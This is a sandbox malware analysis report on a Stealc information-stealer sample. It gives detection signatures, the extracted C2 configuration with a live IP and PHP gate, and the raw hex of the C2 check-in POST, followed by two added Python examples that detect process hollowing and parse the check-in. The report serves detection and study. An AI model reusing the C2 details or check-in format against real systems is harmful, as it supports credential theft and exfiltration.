Windows Analysis Report
5rVhexjLCx.exe

Overview

General Information

Sample name: 5rVhexjLCx.exe
(renamed because the original name is a hash value)
Original sample name: 0b1d171017be0462ff7522614f49afea.exe
Analysis ID: 1528264
MD5: 0b1d171017be0462ff7522614f49afea
SHA1: de5bea1d68ac834060d2b88c667761f6be6d5e3b
SHA256: 548617ec6305c654f71be990786ad737c3fce173e319c78f78d074589f72dbdc
Tags: 32, exe, trojan

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
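The signatures above describe a process-hollowing chain: 5rVhexjLCx.exe creates a process in suspended mode, allocates and writes foreign memory, injects a PE into it, and the hollowed process (MSBuild.exe, see the Networking section) then performs the HTTP C2 traffic. The following is an added example, not part of this Joe Sandbox report and not the Sigma rule it references: it correlates a handful of constructed Sysmon-style events (EventID 1 process creation, 10 process access, 3 network connection, 22 DNS query) that mirror the behaviour in this report. The process GUIDs, the GrantedAccess value, the devenv.exe control event and the parent allowlist are assumptions for illustration; the image paths and the C2 address are the ones the report shows.

```python
from collections import defaultdict

# Windows access-right bits that allow writing code into another process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Assumed allowlist of parents from which MSBuild.exe is expected to be launched.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "cmd.exe", "powershell.exe"}

MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE = r"C:\Users\user\Desktop\5rVhexjLCx.exe"
VS_MSBUILD = r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe"
DEVENV = r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"

# Constructed Sysmon-style events mirroring the report (GUIDs, GrantedAccess and
# the devenv.exe control event are invented; paths and the C2 IP come from the report).
EVENTS = [
    {"EventID": 1, "ProcessGuid": "P0", "Image": SAMPLE, "ParentProcessGuid": "PX",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessGuid": "P2", "Image": MSBUILD, "ParentProcessGuid": "P0",
     "ParentImage": SAMPLE},
    {"EventID": 10, "SourceProcessGuid": "P0", "SourceImage": SAMPLE,
     "TargetProcessGuid": "P2", "TargetImage": MSBUILD, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 3, "ProcessGuid": "P2", "Image": MSBUILD, "Initiated": True,
     "DestinationIp": "62.204.41.150", "DestinationPort": 80},
    # Benign control: a build launched from Visual Studio, no injection, no network.
    {"EventID": 1, "ProcessGuid": "P9", "Image": VS_MSBUILD, "ParentProcessGuid": "P8",
     "ParentImage": DEVENV},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return {ProcessGuid: [reasons]} for MSBuild.exe processes that look hollowed.
    A process is reported only when at least two independent reasons line up."""
    created, access, net, resolved = {}, defaultdict(list), defaultdict(list), defaultdict(set)
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            created[ev["ProcessGuid"]] = ev
        elif eid == 10:
            access[ev["TargetProcessGuid"]].append(ev)
        elif eid == 3:
            net[ev["ProcessGuid"]].append(ev)
        elif eid == 22:  # Sysmon DNS query; QueryResults lists the resolved addresses
            resolved[ev["ProcessGuid"]].update(
                ip.replace("::ffff:", "") for ip in ev["QueryResults"].split(";") if ip)
    findings = {}
    for guid, ev in created.items():
        if basename(ev["Image"]) != "msbuild.exe":
            continue
        reasons = []
        if basename(ev.get("ParentImage", "")) not in EXPECTED_MSBUILD_PARENTS:
            reasons.append(f"unexpected parent {basename(ev['ParentImage'])}")
        for a in access[guid]:
            # The parent opened its own child with rights sufficient to write and run code in it.
            if (a["SourceProcessGuid"] == ev.get("ParentProcessGuid")
                    and int(a["GrantedAccess"], 16) & INJECT_MASK):
                reasons.append("parent opened child with VM_WRITE/VM_OPERATION/CREATE_THREAD")
        for n in net[guid]:
            if n.get("Initiated") and n["DestinationPort"] in (80, 443):
                where = n["DestinationIp"]
                if where not in resolved[guid]:
                    where += " (no DNS query by this process)"
                reasons.append(f"initiated {n['DestinationPort']}/tcp to {where}")
        if len(reasons) >= 2:
            findings[guid] = reasons
    return findings


if __name__ == "__main__":
    for guid, reasons in correlate(EVENTS).items():
        print(guid, *reasons, sep="\n  ")
```

Requiring two independent reasons keeps a developer's MSBuild.exe started from an unusual shell from firing on its own; the Visual Studio control event in the fixture produces no finding, while the sandbox chain produces three.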

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: 5rVhexjLCx.exe Avira: detected
Source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
Source: 5rVhexjLCx.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5rVhexjLCx.exe Joe Sandbox ML: detected
Source: 5rVhexjLCx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: 5rVhexjLCx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00599ABF FindFirstFileExW, 0_2_00599ABF

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 62.204.41.150:80
Source: Malware configuration extractor URLs: http://62.204.41.150/edd20096ecef326d.php
Source: global traffic TCP traffic: 192.168.2.4:60240 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected:
GET / HTTP/1.1
Host: 62.204.41.150
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
POST /edd20096ecef326d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK
Host: 62.204.41.150
Content-Length: 219
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 36 44 46 38 36 33 33 46 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a
Data Ascii:
------DGHIECGCBKFHIEBGHDBK
Content-Disposition: form-data; name="hwid"

426DF8633FF02469173176
------DGHIECGCBKFHIEBGHDBK
Content-Disposition: form-data; name="build"

default6_doz
------DGHIECGCBKFHIEBGHDBK--
Source: Joe Sandbox View ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150 (7 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2 (5 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172 (4 entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 2_2_00406280
Source: unknown HTTP traffic detected:
POST /edd20096ecef326d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK
Host: 62.204.41.150
Content-Length: 219
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 36 44 46 38 36 33 33 46 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a
Data Ascii:
------DGHIECGCBKFHIEBGHDBK
Content-Disposition: form-data; name="hwid"

426DF8633FF02469173176
------DGHIECGCBKFHIEBGHDBK
Content-Disposition: form-data; name="build"

default6_doz
------DGHIECGCBKFHIEBGHDBK--
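The POST above is the Stealc check-in that the Suricata alert fired on: a 219-byte multipart/form-data body carrying only an hwid and a build field (the build value, default6_doz, is the Botnet value from the extracted configuration), sent from the hollowed MSBuild.exe via the WinINet calls listed at 2_2_00406280 to a bare-IP host with no User-Agent header. The same multipart encoding carries the file-by-file exfiltration described in the Classification entry. As an added example that is not part of the report, the following Python rebuilds the request from the report's raw hex and headers, parses the multipart body, and applies a few heuristics to it. The heuristics are my own and do not reproduce the ET 2044243 rule logic; the benign control request is constructed for comparison.

```python
import re

# Body bytes exactly as the report's "Data Raw" dump prints them (constructed here
# from that hex; the capture declares Content-Length: 219, which the parser checks).
CHECKIN_BODY_HEX = """
2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
34 32 36 44 46 38 36 33 33 46 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a
2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a
2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a
"""

# Request line and headers re-typed from the same report entry, in the order it prints them.
CHECKIN_REQUEST = (
    b"POST /edd20096ecef326d.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK\r\n"
    b"Host: 62.204.41.150\r\n"
    b"Content-Length: 219\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
) + bytes.fromhex(CHECKIN_BODY_HEX)

# Constructed benign control: an ordinary multipart upload with a User-Agent and a hostname.
BENIGN_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example.com\r\n"
    b"User-Agent: curl/8.0.1\r\n"
    b"Content-Type: multipart/form-data; boundary=abc\r\n"
    b"Content-Length: 64\r\n"
    b"\r\n"
    b'--abc\r\nContent-Disposition: form-data; name="f"\r\n\r\nhi\r\n--abc--\r\n'
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Minimal RFC 7578 parser: {field name: value} for a multipart/form-data body.
    Parts are delimited by "--" + boundary; each part has headers, a blank line, then data."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return {}
    delimiter = b"--" + m.group(2).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter reached
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        part_headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def analyse(raw):
    """Parse one request and return the parsed form fields plus heuristic indicators."""
    method, path, headers, body = parse_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    hits = []
    if "user-agent" not in headers:
        hits.append("no User-Agent header")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", "")):
        hits.append("Host is a bare IPv4 address")
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        hits.append("Content-Length does not match body")
    if method == "POST" and set(fields) == {"hwid", "build"}:
        hits.append("hwid/build check-in form")
    return {"method": method, "path": path, "fields": fields, "hits": hits}


if __name__ == "__main__":
    for label, req in (("check-in", CHECKIN_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, analyse(req))
```

Run against a stream reassembled from a capture, the parser gives you the hwid and build values to pivot on across other samples, and the "no User-Agent plus bare-IP Host plus two-field form" combination is the shape to look for in proxy logs when the exact gate path or boundary string differs.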
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/J
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpFd
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpnd
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/n
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 60311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60334 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60414 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60357 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60411
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60410
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60419
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60417
Source: unknown Network traffic detected: HTTP traffic on port 60437 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60415
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60412
Source: unknown Network traffic detected: HTTP traffic on port 60484 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60300
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60421
Source: unknown Network traffic detected: HTTP traffic on port 60369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60420
Source: unknown Network traffic detected: HTTP traffic on port 60323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60429
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60428
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60427
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60425
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60423
Source: unknown Network traffic detected: HTTP traffic on port 60495 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60433
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60310
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60430
Source: unknown Network traffic detected: HTTP traffic on port 60425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60473 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60319
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60439
Source: unknown Network traffic detected: HTTP traffic on port 60255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60317
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60438
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60316
Source: unknown Network traffic detected: HTTP traffic on port 60368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60315
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60436
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60435
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60313
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60434
Source: unknown Network traffic detected: HTTP traffic on port 60496 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60310 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60323
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60322
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60442
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60441
Source: unknown Network traffic detected: HTTP traffic on port 60403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60440
Source: unknown Network traffic detected: HTTP traffic on port 60289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60329
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60449
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60448
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60447
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60446
Source: unknown Network traffic detected: HTTP traffic on port 60346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60324
Source: unknown Network traffic detected: HTTP traffic on port 60380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60445
Source: unknown Network traffic detected: HTTP traffic on port 60462 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60471 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60333 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60415 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60379 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60502
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60501
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60500
Source: unknown Network traffic detected: HTTP traffic on port 60416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60378 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60449 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60483 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60291 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60409
Source: unknown Network traffic detected: HTTP traffic on port 60461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60356 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60400
Source: unknown Network traffic detected: HTTP traffic on port 60300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60408
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60407
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60406
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60405
Source: unknown Network traffic detected: HTTP traffic on port 60438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60472 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60404
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 60367 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60260
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60381
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60380
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60372 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60499
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60498
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60497
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60254
Source: unknown Network traffic detected: HTTP traffic on port 60263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60375
Source: unknown Network traffic detected: HTTP traffic on port 60395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60496
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60253
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60374
Source: unknown Network traffic detected: HTTP traffic on port 60452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60495
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60494
Source: unknown Network traffic detected: HTTP traffic on port 60286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60493
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60250
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60492
Source: unknown Network traffic detected: HTTP traffic on port 60475 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60259
Source: unknown Network traffic detected: HTTP traffic on port 60498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60258
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60379
Source: unknown Network traffic detected: HTTP traffic on port 60297 -> 443
